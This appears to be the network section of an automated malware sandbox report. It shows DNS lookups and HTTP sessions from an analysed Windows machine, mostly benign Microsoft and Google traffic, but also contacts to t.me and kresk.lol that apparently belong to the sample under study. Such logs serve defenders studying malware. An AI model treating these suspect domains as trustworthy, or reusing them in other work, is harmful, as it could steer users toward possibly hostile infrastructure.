                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.815529108 CET192.168.2.61.1.1.10xb1a7Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.815819979 CET192.168.2.61.1.1.10x7fb3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.816026926 CET192.168.2.61.1.1.10x5f6cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.975914955 CET192.168.2.61.1.1.10xc05Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.976141930 CET192.168.2.61.1.1.10xe92bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.088332891 CET192.168.2.61.1.1.10xabcbStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.089005947 CET192.168.2.61.1.1.10xf3e9Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.171690941 CET192.168.2.61.1.1.10x4171Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.172724962 CET192.168.2.61.1.1.10xda44Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.309691906 CET192.168.2.61.1.1.10xf4d8Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.309890985 CET192.168.2.61.1.1.10x301dStandard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.423497915 CET192.168.2.61.1.1.10x417bStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.423686981 CET192.168.2.61.1.1.10xfddeStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.565326929 CET192.168.2.61.1.1.10xca58Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.565684080 CET192.168.2.61.1.1.10x3dc6Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:49.494968891 CET1.1.1.1192.168.2.60x451aName error (3)YNwKHeEoflVmSgaTq.YNwKHeEoflVmSgaTqnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:39.617135048 CET1.1.1.1192.168.2.60x4b61No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:41.836621046 CET1.1.1.1192.168.2.60xfcb4No error (0)kresk.lol159.69.102.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.761471987 CET1.1.1.1192.168.2.60x5fcdNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.761604071 CET1.1.1.1192.168.2.60xec0bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.664563894 CET1.1.1.1192.168.2.60xcb26No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.666168928 CET1.1.1.1192.168.2.60x5c58No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:14.184582949 CET1.1.1.1192.168.2.60x8ccbNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:14.184582949 CET1.1.1.1192.168.2.60x8ccbNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:14.253355980 CET1.1.1.1192.168.2.60x2e34No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:16.546101093 CET1.1.1.1192.168.2.60x9c9No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:16.546135902 CET1.1.1.1192.168.2.60x8409No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.958517075 CET1.1.1.1192.168.2.60x2d50No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.958517075 CET1.1.1.1192.168.2.60x2d50No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.958939075 CET1.1.1.1192.168.2.60xb1a7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.959202051 CET1.1.1.1192.168.2.60x5f6cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.959400892 CET1.1.1.1192.168.2.60x7fb3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.959400892 CET1.1.1.1192.168.2.60x7fb3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.119803905 CET1.1.1.1192.168.2.60xe92bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.119880915 CET1.1.1.1192.168.2.60xc05No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.119880915 CET1.1.1.1192.168.2.60xc05No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.232676983 CET1.1.1.1192.168.2.60xabcbNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.232676983 CET1.1.1.1192.168.2.60xabcbNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.232676983 CET1.1.1.1192.168.2.60xabcbNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.232676983 CET1.1.1.1192.168.2.60xabcbNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.314866066 CET1.1.1.1192.168.2.60x4171No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.316761017 CET1.1.1.1192.168.2.60xda44No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.453454018 CET1.1.1.1192.168.2.60x301dNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.533147097 CET1.1.1.1192.168.2.60xf4d8No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.566700935 CET1.1.1.1192.168.2.60x417bNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.567588091 CET1.1.1.1192.168.2.60xfddeNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.708595037 CET1.1.1.1192.168.2.60xca58No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.708595037 CET1.1.1.1192.168.2.60xca58No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.808320045 CET1.1.1.1192.168.2.60x3dc6No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                    • otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                                                                                                    • kresk.lol
                                                                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                                                                    • fs.microsoft.com
                                                                                                                                                                                                                                                                                                    • api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                    • login.live.com
                                                                                                                                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                                                                      • assets2.msn.com
                                                                                                                                                                                                                                                                                                      • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                      • c.msn.com
                                                                                                                                                                                                                                                                                                      • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      • arc.msn.com
                                                                                                                                                                                                                                                                                                      • img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                    • data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                    • edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                    • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    0192.168.2.64970013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:56 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:56 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 00:59:56 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                                    Content-Length: 218853
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public
                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DD10CBC2E3B852"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T005956Z-174f78459685m244hC1EWRgp2c00000016eg00000000np6g
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:56 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:57 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    1192.168.2.64970313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 00:59:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 2980
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
